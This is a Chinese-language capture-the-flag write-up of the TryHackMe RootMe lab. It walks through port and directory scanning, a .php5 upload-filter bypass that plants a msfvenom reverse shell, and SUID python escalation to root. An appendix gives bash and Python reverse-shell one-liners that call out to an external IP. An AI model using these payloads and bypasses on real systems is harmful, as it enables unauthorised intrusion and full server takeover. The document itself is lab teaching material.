Root Me WriteUP
涉及知识:
python提权,文件上传绕过
渗透过程:
nmap扫描目标主机开放端口:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate 10000 10.10.131.120
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:29 EST
Nmap scan report for 10.10.131.120
Host is up (0.20s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p22,80 --min-rate 10000 10.10.131.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:30 EST
Nmap scan report for 10.10.131.120
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 --min-rate 10000 10.10.131.120
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:30 EST
Nmap scan report for 10.10.131.120
Host is up (0.19s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Nmap done: 1 IP address (1 host up) scanned in 35.90 seconds
通过目标端口的扫描,发现主机开放了22和80两个端口,主机为Ubuntu Linux,80端口发现运行的服务为 Apache/2.4.29。 (备注:一般apache是php,IIS是asp或者aspx,tomcat是jsp)
访问80端口页面: 
页面源代码查看: 
没有发现特殊信息,继续进行目标主机的目录爆破,看能否有新的发现:
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://10.10.131.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
[sudo] password for kali:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.131.120
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 316] [--> http://10.10.131.120/uploads/]
/css (Status: 301) [Size: 312] [--> http://10.10.131.120/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.131.120/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.131.120/panel/]
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$经过目录爆破,发现有 /uploads、/css、/js、/panel、/service-status 目录。 访问这个几个目录后发现/panel目录为文件上传页面,/uploads目录为上传的文件访问页面,我们尝试上传.php文件木马,通过访问上传的php文件,来获得反弹shell,进入目标主机。首先,使用msfvenom生成php木马:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.141.149 LPORT=4444 -f raw > rev.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34851 bytes
┌──(kali㉿kali)-[~]
└─$生成木马后,尝试上传php文件: 
发现服务器禁止上传.php文件,打开burpsuite抓包尝试修改content-type、大小写,编码,截断,双写后缀名,空格,先传JPG抓包修改成PHP,不常见扩展名例如PHP3,PHP4、关闭前端js验证后发现,上传.php5不常见文件名可以正常上传并执行文件。 
打开msf设置payload和监听:
┌──(kali㉿kali)-[~]
└─$ msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 10.9.141.149
lhost => 10.9.141.149
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.9.141.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.9.141.149:4444
获得立足点:
在目标主机中,切换到/uploads页面,执行rev.php,可以在msf中收到一个反弹shell:
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.9.141.149:4444
[*] Meterpreter session 1 opened (10.9.141.149:4444 -> 10.10.212.28:57938) at 2023-11-12 20:56:24 -0500
meterpreter >
meterpreter > shell
Process 1341 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.4$
usr.txt的flag获取:
进入目标主机之后,我们进行flag的查找:
bash-4.4$ ls
ls
rev.php5
bash-4.4$ pwd
pwd
/var/www/html/uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
Website.zip css index.php js panel uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
html user.txt
bash-4.4$ cat user.txt
cat user.txt
THM{y0u_g0t_a_sh3ll}
bash-4.4$
查找完flag后,可以用find命令查找可用提权的项目:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} bash-4.4$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
bash-4.4$
获得root权限
可以看到有/usr/bin/python项可供我们提权使用,所以直接执行python提权:
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
#查找最后一个flag:
# cat /root/root.txt
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
#至此,整个提权过程结束
总结:
我们对目标主机开放端口进行扫描,发现目标主机开放了22,80两个端口,80端口是web服务,相对22端口暴漏的信息要多,首先要对80端口进行渗透测试。访问80端口后,并没有什么特殊的发现,所以我们使用gobuster进行目录爆破,看有无其他隐藏目录。扫描结束后,发现文件上传目录/paenl和文件目录/uploads,由于目标主机运行的是apache,遂上传.php文件木马进行shell获取,经过数次尝试后,上传rev.php5格式文件可以准确解析为.php。上传php文件获取shell后,使用find命令查找可用的提权项,发现可用python提权,使用python提权成功获得root权限,获取flag。
附:find命令和python方式反弹shell命令# 用find 命令执行
find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.2.128/9919 0>&1 \;# python 方式反弹
find /etc/passwd -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.128",9919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-ip"]);' \;
